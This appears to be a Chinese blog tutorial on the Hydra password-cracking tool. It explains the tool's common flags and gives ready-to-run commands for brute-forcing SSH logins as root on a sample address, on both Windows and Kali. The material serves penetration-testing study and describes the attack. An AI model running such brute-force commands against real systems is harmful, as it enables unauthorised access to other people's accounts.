请注意,本文编写于 775 天前,最后修改于 775 天前,其中某些信息可能已经过时。
声明
以下内容,均来源于互联网已公开内容,由于传播利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,文章作者不承担任何责任。请遵守相关法律,禁止非法用途!
常见参数
-l
指定单个用户名,适合在知道用户名爆破用户名密码时使用-L
指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径)-p
指定单个密码,适合在知道密码爆破用户名时使用-P
指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议为绝对路径)-C
当用户名和密码存储到一个文件时使用此参数。注意,文件(字典)存储的格式必须为 "用户名:密码" 的格式。-M
指定多个攻击目标,此参数为存储攻击目标的文件的路径(建议为绝对路径)。注意:列表文件存储格式必须为 "地址:端口"-t
指定爆破时的任务数量(可以理解为线程数),默认为16-S
指定爆破时使用 SSL 链接-R
继续从上一次爆破进度上继续爆破-v/-V
显示爆破的详细信息-f
一但爆破成功一个就停止爆破服务
常用的服务:telnet ftp pop3 mssql mysql ssh ssh2等
爆破ssh
Windows
hydra.exe -l root -w 10 -t 5 -P C:\Users\Whoami\Desktop\pass.txt -v -f 10.91.2.20 ssh
命令详细:
- 爆破用户名:root(
-l
) - 超时:10秒(
-w
) - 使用的密码字典:
- C:\Users\Whoami\Desktop\pass.txt (
-P
) - 爆破线程数:5 (
-t
) - 显示详细信息 (
-v
) - 爆破成功一个后停止 (
-f
) - 攻击目标:10.91.2.20
- 使用的模块:ssh
Kali
和Windows大同小异
hydra -l root -w 10 -t 5 -P /usr/share/wordlists/metasploit/unix_passwords.txt -v -f 10.91.2.20 ssh